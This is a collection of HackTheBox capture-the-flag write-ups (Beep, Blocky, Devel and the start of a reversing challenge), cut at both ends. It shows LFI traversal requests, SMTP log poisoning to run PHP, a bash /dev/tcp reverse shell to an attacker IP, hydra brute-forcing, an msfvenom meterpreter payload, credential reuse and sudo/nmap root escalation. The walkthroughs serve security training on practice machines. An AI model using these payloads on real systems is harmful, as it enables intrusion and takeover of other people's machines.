134 | └──╼ $ nc -lvnp 4444 135 | listening on [any] 4444 ... 136 | connect to [10.10.14.15] from (UNKNOWN) [10.10.10.48] 49812 137 | Linux base 4.15.0-88-generic #88-Ubuntu SMP Tue Feb 11 20:11:34 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 138 | 09:26:48 up 24 min, 0 users, load average: 0.00, 0.00, 0.00 139 | USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT 140 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 141 | /bin/sh: 0: can't access tty; job control turned off 142 | $ id 143 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 144 | ``` 145 | 146 | Inspecting the `config.php`, which we previously found in the login directory, we can now see the admin password and username: 147 | 148 | ``` 149 | for help 217 | nmap> !sh 218 | id 219 | uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) 220 | ``` 221 | 222 | ### Local File Inclusion to Remote Code Execution 223 | When I read some other writeups, I was fascinated by the fact that there exist several ways to pwn the machine. Another way I stumbled upon exploited LFI. As I am a big fan of LFIs I also had to try this one. 224 | 225 | 226 | So again we go back to our LFI vulnerability: 227 | ``` 228 | GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00 229 | ``` 230 | 231 | From the ennumeration part, we know that Port 25 (SMTP) is open. Let's it to send a mail to the user `asterisk`, which we leaked from the /etc/passwd file. 232 | 233 | ``` 234 | └──╼ $ telnet 10.129.1.226 25 235 | Trying 10.129.1.226... 236 | Connected to 10.129.1.226. 237 | Escape character is '^]'. 238 | 220 beep.localdomain ESMTP Postfix 239 | EHLO babbadeckl 240 | 250-beep.localdomain 241 | 250-PIPELINING 242 | 250-SIZE 10240000 243 | 250-VRFY 244 | 250-ETRN 245 | 250-ENHANCEDSTATUSCODES 246 | 250-8BITMIME 247 | 250 DSN 248 | VRFY asterisk@localhost <- verify if this user really exists 249 | 252 2.0.0 asterisk@localhost 250 | mail from: babbadeckl@pwn.com 251 | 250 2.1.0 Ok 252 | rcpt to: asterisk@localhost 253 | 250 2.1.5 Ok 254 | data 255 | 354 End data with . 256 | Subject: RCE 257 | <- RCE code 258 | 259 | . 260 | 250 2.0.0 Ok: queued as 86A1ED92FF 261 | quit 262 | 221 2.0.0 Bye 263 | Connection closed by foreign host. 264 | ``` 265 | 266 | Afterwards we can check if the email was successfully sent and received: 267 | 268 | ``` 269 | GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../var/mail/asterisk%00 270 | ``` 271 | 272 | With the LFI, we can leak the email that we have just sent. This also means, that our PHP code now gets executed! 273 | 274 | ``` 275 | From babbadeckl@pwn.com Wed Jan 13 22:48:18 2021 276 | Return-Path: 277 | X-Original-To: asterisk@localhost 278 | Delivered-To: asterisk@localhost.localdomain 279 | Received: from babbadeckl (unknown [10.10.14.50]) 280 | by beep.localdomain (Postfix) with ESMTP id 86A1ED92FF 281 | for ; Wed, 13 Jan 2021 22:47:17 +0200 (EET) 282 | Subject: RCE 283 | Message-Id: <20210113204725.86A1ED92FF@beep.localdomain> 284 | Date: Wed, 13 Jan 2021 22:47:17 +0200 (EET) 285 | From: babbadeckl@pwn.com 286 | To: undisclosed-recipients:; 287 | ``` 288 | 289 | Now when we append our malicious parameter `babbadeckl`, that we included in the injected PHP code, we have RCE: 290 | 291 | ``` 292 | GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../var/mail/asterisk%00&babbadeckl=id 293 | 294 | 295 | Date: Wed, 13 Jan 2021 22:47:17 +0200 (EET) 296 | From: babbadeckl@pwn.com 297 | To: undisclosed-recipients:; 298 | 299 | uid=100(asterisk) gid=101(asterisk) groups=101(asterisk) 300 | uid=100(asterisk) gid=101(asterisk) groups=101(asterisk) 301 | ``` 302 | 303 | Let's spawn a reverse shell! 304 | 305 | ``` 306 | module_name=../../../../../../../../var/mail/asterisk%00&babbadeckl=bash+-i+>%26+/dev/tcp/10.10.14.50/4444+0>%261 307 | ``` 308 | 309 | And we get a shell! Now simply follow the steps from above to obtain root privileges (sudo nmap). 310 | 311 | ``` 312 | └──╼ $ nc -lvnp 4444 313 | listening on [any] 4444 ... 314 | connect to [10.10.14.50] from (UNKNOWN) [10.129.1.226] 47868 315 | bash: no job control in this shell 316 | bash-3.2$ id 317 | uid=100(asterisk) gid=101(asterisk) groups=101(asterisk) 318 | ``` 319 | 320 | 321 | ## Post Exploitation 322 | 323 | We can now obtain the root flag: 324 | 325 | ``` 326 | [root@beep ~]# cat root.txt 327 | 78284bce7c9d0b21378ac5bd69ee89c9 328 | ``` -------------------------------------------------------------------------------- /Beep/pics/admin_panel.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Beep/pics/admin_panel.png -------------------------------------------------------------------------------- /Beep/pics/config.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Beep/pics/config.png -------------------------------------------------------------------------------- /Beep/pics/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Beep/pics/logo.png -------------------------------------------------------------------------------- /Beep/pics/vvtiger.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Beep/pics/vvtiger.png -------------------------------------------------------------------------------- /Beep/pics/website.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Beep/pics/website.png -------------------------------------------------------------------------------- /Blocky/README.md: -------------------------------------------------------------------------------- 1 | ![](pics/logo.png) 2 | 3 | # Blocky (Linux) 4 | 5 | ## Enumeration 6 | 7 | ``` 8 | rustscan --ulimit 5000 10.129.1.53 -- -sC -sV -o port_scan 9 | 10 | PORT STATE SERVICE REASON VERSION 11 | 21/tcp open ftp? syn-ack 12 | 22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) 13 | | ssh-hostkey: 14 | | 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA) 15 | | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXqVh031OUgTdcXsDwffHKL6T9f1GfJ1/x/b/dywX42sDZ5m1Hz46bKmbnWa0YD3LSRkStJDtyNXptzmEp31Fs2DUndVKui3LCcyKXY6FSVWp9ZDBzlW3aY8qa+y339OS3gp3aq277zYDnnA62U7rIltYp91u5VPBKi3DITVaSgzA8mcpHRr30e3cEGaLCxty58U2/lyCnx3I0Lh5rEbipQ1G7Cr6NMgmGtW6LrlJRQiWA1OK2/tDZbLhwtkjB82pjI/0T2gpA/vlZJH0elbMXW40Et6bOs2oK/V2bVozpoRyoQuts8zcRmCViVs8B3p7T1Qh/Z+7Ki91vgicfy4fl 16 | | 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA) 17 | | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNgEpgEZGGbtm5suOAio9ut2hOQYLN39Uhni8i4E/Wdir1gHxDCLMoNPQXDOnEUO1QQVbioUUMgFRAXYLhilNF8= 18 | | 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519) 19 | |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILqVrP5vDD4MdQ2v3ozqDPxG1XXZOp5VPpVsFUROL6Vj 20 | 80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu)) 21 | |_http-generator: WordPress 4.8 22 | | http-methods: 23 | |_ Supported Methods: GET HEAD POST OPTIONS 24 | |_http-server-header: Apache/2.4.18 (Ubuntu) 25 | |_http-title: BlockyCraft – Under Construction! 26 | 25565/tcp open minecraft syn-ack Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20) 27 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 28 | ``` 29 | 30 | ## Examine Port 21 - FTP (???) 31 | 32 | On Port 21 we have a service running which seems to be FTP. However, nmap already marks it as "?", as it apparently is not FTP. To make sure, we use the ftp client and connect to the port: 33 | 34 | ``` 35 | └──╼ $ ftp 10.129.1.53 36 | Connected to 10.129.1.53. 37 | ``` 38 | 39 | After like 20 seconds without receiving any output, it shows us following: 40 | 41 | ``` 42 | 220 ProFTPD 1.3.5a Server (Debian) [::ffff:10.129.1.53] 43 | Name (10.129.1.53:ctf): 44 | ``` 45 | 46 | This is already quite strange. But at this point I simply assumed it's some network issues. So I tried logging in as `Anonymous`, as this usually works on the most vulnerable systems, but it does not work here. As we do not have any further credentials that we could try, we have to skip FTP for now and proceed with the Apache Server. 47 | 48 | ## Examine Port 80 - Apache Server 49 | 50 | ![](pics/website.png) 51 | 52 | On Port 80, we see some minecraft themed web application that was apparently developed with Wordpress (visible at the bottom of the website). 53 | 54 | By running gobuster, we can confirm, that this is indeed a Wordpress application, as it contains all common directories, such as wp-admin: 55 | 56 | ``` 57 | └──╼ $ gobuster dir -u "10.129.1.53" -w /usr/share/wordlists/dirb/big.txt 58 | =============================================================== 59 | Gobuster v3.0.1 60 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) 61 | =============================================================== 62 | [+] Url: http://10.129.1.53 63 | [+] Threads: 10 64 | [+] Wordlist: /usr/share/wordlists/dirb/big.txt 65 | [+] Status codes: 200,204,301,302,307,401,403 66 | [+] User Agent: gobuster/3.0.1 67 | [+] Timeout: 10s 68 | =============================================================== 69 | 2021/01/18 18:17:57 Starting gobuster 70 | =============================================================== 71 | /.htaccess (Status: 403) 72 | /.htpasswd (Status: 403) 73 | /javascript (Status: 301) 74 | /phpmyadmin (Status: 301) 75 | /plugins (Status: 301) 76 | /server-status (Status: 403) 77 | /wiki (Status: 301) 78 | /wp-admin (Status: 301) 79 | /wp-content (Status: 301) 80 | /wp-includes (Status: 301) 81 | ``` 82 | 83 | But it also contains some other directories such as `/wiki` and `/plugins`. We will check them out later. For now we just click through the pages and search for useful information. One of the recent posts contains was posted by `Notch`. Maybe this is a valid username for the wp-admin login. Let's try it. 84 | 85 | ![](pics/wordpress_feedback.png) 86 | 87 | And indeed! It exists. Let's see if Notch has a weak password. 88 | 89 | For that, we first have to intercept the login POST request with Burpsuite, to see the required parameters: 90 | 91 | ``` 92 | log=notch&pwd=test&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.129.1.53%2Fwp-admin%2F&testcookie=1 93 | ``` 94 | 95 | Now we can use a tool like hydra to bruteforce the password of Notch: 96 | 97 | ``` 98 | hydra -l notch -P /usr/share/wordlists/rockyou.txt 10.129.1.53 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.129.1.53%2Fwp-admin%2F&testcookie=1:F=incorrect" -vvv -f 99 | ``` 100 | 101 | However, this led to nothing. Apparently, the password of notch is quite strong and probably not the intended way how to pwn the machine. 102 | 103 | Let's see what's in the other directories. 104 | 105 | In wiki we only see a "Under construction message": 106 | 107 | ``` 108 | Under Construction 109 | 110 | Please check back later! We will start publishing wiki articles after we have finished the main server plugin! 111 | 112 | The new core plugin will store your playtime and other information in our database, so you can see your own stats! 113 | ``` 114 | 115 | But we should probably check out the plugins, as the wiki is hinting towards it. 116 | 117 | ![](pics/plugins.png) 118 | 119 | Here we can see 2 jar files `BlockCore.jar` and `griefprevention...jar`. Let's download them to our local machine and inspect them. 120 | 121 | Jar files can be "unpacked" by running following command 122 | ``` 123 | jar -xf BlockyCore.jar 124 | ``` 125 | we receive the content of it, namely the directory `com`. Inside the directory, we find a class file `BlockyCore.class`. To inspect the java bytecode of it, we can run: 126 | 127 | ``` 128 | javap -c BlockyCore 129 | 130 | Warning: File ./BlockyCore.class does not contain class BlockyCore 131 | Compiled from "BlockyCore.java" 132 | public class com.myfirstplugin.BlockyCore { 133 | public java.lang.String sqlHost; 134 | 135 | public java.lang.String sqlUser; 136 | 137 | public java.lang.String sqlPass; 138 | 139 | public com.myfirstplugin.BlockyCore(); 140 | Code: 141 | 0: aload_0 142 | 1: invokespecial #12 // Method java/lang/Object."":()V 143 | 4: aload_0 144 | 5: ldc #14 // String localhost 145 | 7: putfield #16 // Field sqlHost:Ljava/lang/String; 146 | 10: aload_0 147 | 11: ldc #18 // String root 148 | 13: putfield #20 // Field sqlUser:Ljava/lang/String; 149 | 16: aload_0 150 | 17: ldc #22 // String 8YsqfCTnvxAUeduzjNSXe22 151 | 19: putfield #24 // Field sqlPass:Ljava/lang/String; 152 | 22: return 153 | 154 | public void onServerStart(); 155 | Code: 156 | 0: return 157 | 158 | public void onServerStop(); 159 | Code: 160 | 0: return 161 | 162 | public void onPlayerJoin(); 163 | Code: 164 | 0: aload_0 165 | 1: ldc #33 // String TODO get username 166 | 3: ldc #35 // String Welcome to the BlockyCraft!!!!!!! 167 | 5: invokevirtual #37 // Method sendMessage:(Ljava/lang/String;Ljava/lang/String;)V 168 | 8: return 169 | 170 | public void sendMessage(java.lang.String, java.lang.String); 171 | Code: 172 | 0: return 173 | } 174 | ``` 175 | 176 | It contains some quite interesting comments! 177 | 178 | ``` 179 | // String root 180 | // Field sqlUser 181 | 182 | // String 8YsqfCTnvxAUeduzjNSXe22 183 | // Field sqlPass 184 | ``` 185 | 186 | So apparently `root:8YsqfCTnvxAUeduzjNSXe22` are the credentials for the root SQL user. So how can we use it? During our enumeration, we found a `phpmyadmin` directory, in which we can probably use the credentials to access the databases! 187 | 188 | ![](pics/phpmyadmin_login.png) 189 | 190 | And it works! We now have access to the databases. 191 | 192 | ![](pics/phpmyadmin.png) 193 | 194 | Inspecting the database `wordpress` we see a table called `wp_users`. 195 | 196 | ![](pics/notch_credentials.png) 197 | 198 | It contains the password hash of the user notch: `$P$BiVoTj899ItS1EZnMhqeqVbrZI4Oq0/` 199 | 200 | Some research reveals that CMS like WordPress or Drupal use the portable PHP password hashing framework `phpass` (https://www.openwall.com/phpass/). We could try to bruteforce it, but as we are root, we can simply create our own hash of a known password and insert it into the database. For this, I used following website: 201 | http://scriptserver.mainframe8.com/wordpress_password_hasher.php 202 | 203 | Now we can login as Notch! 204 | 205 | ![](pics/wp_admin_login.png) 206 | 207 | ## Gaining an Initial Foothold 208 | 209 | For obtaining a reverse shell we have several options. I've decided to inject a PHP reverse shell into the themes as following: 210 | 211 | ![](pics/themes_editor.png) 212 | 213 | Now when loading this file by accessing it via the browser: 214 | 215 | ``` 216 | http://10.129.1.53/wp-content/themes/twentyseventeen/404.php 217 | ``` 218 | 219 | we receive a reverse shell! 220 | 221 | ![](pics/reverse_shell.png) 222 | 223 | ## Privilege Escalation 224 | 225 | We know that user `notch` exists. Let's examine his home directory. 226 | 227 | ``` 228 | drwxrwxr-x 7 notch notch 4096 Jul 2 2017 minecraft 229 | -r-------- 1 notch notch 32 Jul 2 2017 user.txt 230 | ``` 231 | 232 | Unforunately, we do not have enough permissions to read the user.txt. Also the investigation of the minecraft directory in the home directory led to nothing. After another hour of trying some stuff and being frustrated, I decided to try the SQL Root password as the password for notch, as he seems to be the only user on the system. Maybe he has used the same password for multiple services. And indeed. Huge facepalm at this moment. 233 | 234 | From here it's rather easy, as notch is on the sudoers list: 235 | 236 | ``` 237 | notch@Blocky:/var/www$ sudo -l 238 | [sudo] password for notch: 239 | Matching Defaults entries for notch on Blocky: 240 | env_reset, mail_badpass, 241 | secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 242 | 243 | User notch may run the following commands on Blocky: 244 | (ALL : ALL) ALL 245 | ``` 246 | 247 | So we simply run `sudo /bin/sh` or `su -` and we obtain the root shell! 248 | 249 | ``` 250 | root@Blocky:~# id 251 | uid=0(root) gid=0(root) groups=0(root) 252 | ``` -------------------------------------------------------------------------------- /Blocky/pics/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Blocky/pics/logo.png -------------------------------------------------------------------------------- /Blocky/pics/notch_credentials.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Blocky/pics/notch_credentials.png -------------------------------------------------------------------------------- /Blocky/pics/phpmyadmin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Blocky/pics/phpmyadmin.png -------------------------------------------------------------------------------- /Blocky/pics/phpmyadmin_login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Blocky/pics/phpmyadmin_login.png -------------------------------------------------------------------------------- /Blocky/pics/plugin_editor.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Blocky/pics/plugin_editor.png -------------------------------------------------------------------------------- /Blocky/pics/plugins.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Blocky/pics/plugins.png -------------------------------------------------------------------------------- /Blocky/pics/reverse_shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Blocky/pics/reverse_shell.png -------------------------------------------------------------------------------- /Blocky/pics/themes_editor.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Blocky/pics/themes_editor.png -------------------------------------------------------------------------------- /Blocky/pics/website.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Blocky/pics/website.png -------------------------------------------------------------------------------- /Blocky/pics/wordpress_feedback.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Blocky/pics/wordpress_feedback.png -------------------------------------------------------------------------------- /Blocky/pics/wp_admin_login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Blocky/pics/wp_admin_login.png -------------------------------------------------------------------------------- /Devel/README.md: -------------------------------------------------------------------------------- 1 | ![](pics/logo.png) 2 | 3 | # Devel (Windows) 4 | 5 | ## Enumeration 6 | 7 | ``` 8 | rustscan 10.129.79.250 -- -Pn -sC -sV -o port_scan 9 | 10 | PORT STATE SERVICE REASON VERSION 11 | 21/tcp open ftp syn-ack Microsoft ftpd 12 | | ftp-anon: Anonymous FTP login allowed (FTP code 230) 13 | | 03-18-17 01:06AM aspnet_client 14 | | 03-17-17 04:37PM 689 iisstart.htm 15 | |_03-17-17 04:37PM 184946 welcome.png 16 | | ftp-syst: 17 | |_ SYST: Windows_NT 18 | 80/tcp open http syn-ack Microsoft IIS httpd 7.5 19 | | http-methods: 20 | | Supported Methods: OPTIONS TRACE GET HEAD POST 21 | |_ Potentially risky methods: TRACE 22 | |_http-server-header: Microsoft-IIS/7.5 23 | |_http-title: IIS7 24 | Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows 25 | ``` 26 | 27 | The machine has an open FTP port (which allows Anonymous login) as well as a webservice running on Port 80. 28 | 29 | ### Examine Port 21 - Anonymous FTP login 30 | 31 | ``` 32 | ftp> dir 33 | 200 PORT command successful. 34 | 125 Data connection already open; Transfer starting. 35 | 03-18-17 01:06AM aspnet_client 36 | 03-17-17 04:37PM 689 iisstart.htm 37 | 03-17-17 04:37PM 184946 welcome.png 38 | 226 Transfer complete. 39 | ``` 40 | 41 | We can follow the `aspnet_client` path until `"/aspnet_client/system_web/2_0_50727"`. However, there are no interesting files. 42 | Let's see what's on the webserver. 43 | 44 | ### Examine Port 80 - Microsoft IIS (Internet Information Service) 45 | 46 | ![](pics/welcome.png) 47 | 48 | Inspecting the open Port 80, we only see a website containig a welcome picture. This is already very suspicious, as we have seen such a welcome png on the ftp server. Maybe they are even the same. Let's check if the directory `aspnet_client` exists. 49 | 50 | ``` 51 | gobuster dir -u "http://10.129.79.250" -w /usr/share/wordlists/dirb/big.txt 52 | 53 | /aspnet_client (Status: 301) 54 | ``` 55 | 56 | It does! So it seems like the FTP server contains all the files that are hosted on the webserver. Maybe we have write permissions to the directory, via the Anonymous FTP user. If so, we can upload a simple reverse shell script and access it via the browser. 57 | 58 | ## Exploitation 59 | 60 | As Windows server mostly support `ASP.NET`, I decided to upload a ASPX reverse shell. Credits to `borjmz` (https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx) for the aspx reverse shell code. 61 | 62 | With the FTP client I created a directory `test` in the root directory and uploaded the reverse shell ASPX file into it. Afterwards I accessed the file via the browser. 63 | 64 | ![](pics/reverse_shell.png) 65 | 66 | Now it's time for privilege escalation. This [github repository](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md) lists many options about how to exploit the windows environment. 67 | 68 | However, none of them works. That's when I decided to switch to metasploit. Maybe it does offer us some ways. 69 | 70 | (At this point my machine crashed and I had to reset it. Therefore for the rest of the writeup it also has a new IP address: 10.129.80.0 instead of 10.129.79.250) 71 | 72 | First we have to create a meterpreter reverse shell. We can use msfvenom for that. 73 | 74 | ``` 75 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.50 LPORT=4444 -a x86 -f aspx > shell.aspx 76 | ``` 77 | 78 | Then we again upload this file via FTP. 79 | 80 | Before accessing the file via the browser, we first have to set up our metasploit listener: 81 | 82 | ![](pics/metasploit.png) 83 | 84 | Now run the listener and open the uploaded shell via the browser. You will receive a meterpreter session as result: 85 | 86 | ![](pics/meterpreter.png) 87 | 88 | As we've already tested the user's privileges with the manual shell, we can skip this part and directly move to the privilege escalation part. We can use a metasploit module called `local_exploit_suggester`, to check which modules can be used to gain a system shell. 89 | 90 | Therefore, first put the current meterpreter session into the background and execute following: 91 | 92 | ![](pics/privilege_escalation.png) 93 | 94 | It provides us with many exploit suggestions that we can try: 95 | 96 | ![](pics/suggester.png) 97 | 98 | Let's try them: 99 | 100 | 1) exploit/windows/local/bypassuac_eventvwr: Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module 101 | 2) exploit/windows/local/ms10_015_kitrap0d: Works! 102 | ![](pics/system_shell.png) 103 | 104 | Information about the exploit can be found here: https://www.exploit-db.com/exploits/11199. Apparently it's a pretty famous exploit and also very techincal. So enjoy the read. 105 | 106 | ## Post Exploitation 107 | 108 | User flag: 109 | 110 | ``` 111 | c:\Users\babis\Desktop>type user.txt.txt 112 | type user.txt.txt 113 | 9ecdd6a3aedf24b41562fea70f4cb3e8 114 | ``` 115 | 116 | Root flag: 117 | 118 | ``` 119 | c:\Users\Administrator\Desktop>type root.txt.txt 120 | type root.txt.txt 121 | e621a0b5041708797c4fc4728bc72b4b 122 | ``` -------------------------------------------------------------------------------- /Devel/pics/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Devel/pics/logo.png -------------------------------------------------------------------------------- /Devel/pics/metasploit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Devel/pics/metasploit.png -------------------------------------------------------------------------------- /Devel/pics/meterpreter.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Devel/pics/meterpreter.png -------------------------------------------------------------------------------- /Devel/pics/privilege_escalation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Devel/pics/privilege_escalation.png -------------------------------------------------------------------------------- /Devel/pics/reverse_shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Devel/pics/reverse_shell.png -------------------------------------------------------------------------------- /Devel/pics/suggester.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Devel/pics/suggester.png -------------------------------------------------------------------------------- /Devel/pics/system_shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Devel/pics/system_shell.png -------------------------------------------------------------------------------- /Devel/pics/welcome.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Devel/pics/welcome.png -------------------------------------------------------------------------------- /Doctor/pics/admin_post.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Doctor/pics/admin_post.png -------------------------------------------------------------------------------- /Doctor/pics/colorlib.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Doctor/pics/colorlib.png -------------------------------------------------------------------------------- /Doctor/pics/logged_in.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Doctor/pics/logged_in.png -------------------------------------------------------------------------------- /Doctor/pics/login_page.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Doctor/pics/login_page.png -------------------------------------------------------------------------------- /Doctor/pics/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Doctor/pics/logo.png -------------------------------------------------------------------------------- /Doctor/pics/posts_test.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Doctor/pics/posts_test.png -------------------------------------------------------------------------------- /Doctor/pics/root_shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Doctor/pics/root_shell.png -------------------------------------------------------------------------------- /Doctor/pics/splunk.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Doctor/pics/splunk.png -------------------------------------------------------------------------------- /Doctor/pics/splunk_loggedin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Doctor/pics/splunk_loggedin.png -------------------------------------------------------------------------------- /Doctor/pics/ssti_identifcation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Doctor/pics/ssti_identifcation.png -------------------------------------------------------------------------------- /Doctor/pics/website.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Doctor/pics/website.png -------------------------------------------------------------------------------- /FindTheEasyPass/README.md: -------------------------------------------------------------------------------- 1 | # Beginner Track - Find The Easy pass 2 | 3 | Description: 4 | 5 | Find the password (say PASS) and enter the flag in the form HTB{PASS} 6 | 7 | The first step is to download the zip and unzip it (password: hackthebox). It reveals an executeable called `EasyPass.exe`. To run it you either use a Windows system or use Wine in Linux. 8 | 9 | ![](pics/easypassexe.png) 10 | 11 | If we enter a password like `test` and press the `Check Password` button, we are notified that our password is wrong. 12 | 13 | ![](pics/wrongpassword.png) 14 | 15 | Now that we got some information, we can open a debugger/disassembler to analyze the code. You got several options for that (IDA, Immunity, Ollydbg, Ghidra). Choose the one that you like most. I chose IDA for this task. 16 | 17 | If you open the executable with IDA you should see something like this: 18 | 19 | ![](pics/ida.png) 20 | 21 | As we already know that we are prompted with a "Wrong password" message, once we enter a wrong password, we can search for this specifc string. 22 | 23 | ![](pics/location.png) 24 | 25 | If you are familiar with Assembly, then you should directly see what's happening. Let's take a look at the graph, so that everybody sees it. 26 | 27 | ![](pics/graph.png) 28 | 29 | So what's happening is following: 30 | 31 | `CALL sub_404628` (the second line from the bottom in the upper rectangle), calls a function `sub_404628`. We currently don't know what this functions does, but the outcome of it decides whether we get a "Congratulations! Good Job" message or the "Wrong Password" one (`jnz` = Jump if not zero to the "Wrong Password" part, else continue to "Good Job"). 32 | 33 | Let's take a look at the function. 34 | 35 | ![](pics/passwordfunction.png) 36 | 37 | It's basically just comparing two values (EAX and EDX). Depending on their equality, we get a zero flag or not. 38 | 39 | Let's set a breakpoint at the `CALL sub_404628` of the "main graph" and run the program. We can then investigate which values are in those two registers. (Shortcuts: F2 = breakpoint, F9 = start the program) 40 | 41 | Once reaching that breakpoint (I entered the password `test`), we can take a look at the General Registers, especially RAX and RDX. 42 | 43 | ![](pics/registers.png) 44 